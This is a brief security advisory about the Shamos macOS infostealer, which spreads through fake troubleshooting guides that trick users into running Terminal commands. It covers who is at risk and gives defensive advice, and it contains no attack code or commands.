Fake Mac fixes trick users into installing new Shamos infostealer
What’s new: A new infostealer malware named ‘Shamos’ is targeting Mac devices through ClickFix attacks, which impersonate troubleshooting guides. Developed by the cybercriminal group “COOKIE SPIDER,” Shamos is a variant of the Atomic macOS Stealer (AMOS) and is designed to steal sensitive data from web browsers, Keychain items, Apple Notes, and cryptocurrency wallets. The malware has attempted infections in over 300 environments since June 2025.
Who’s affected
Mac users who encounter malvertising or fake GitHub repositories that prompt them to execute shell commands in the macOS Terminal are at risk. These commands are disguised as fixes for common macOS issues but actually download and execute the Shamos malware.
What to do
- Do not execute commands found online unless you fully understand their function.
- Avoid clicking on sponsored search results for macOS help; instead, use the Apple Community forums or the built-in Help feature.
- Educate users about the risks of ClickFix attacks and the importance of verifying the source of troubleshooting guides.
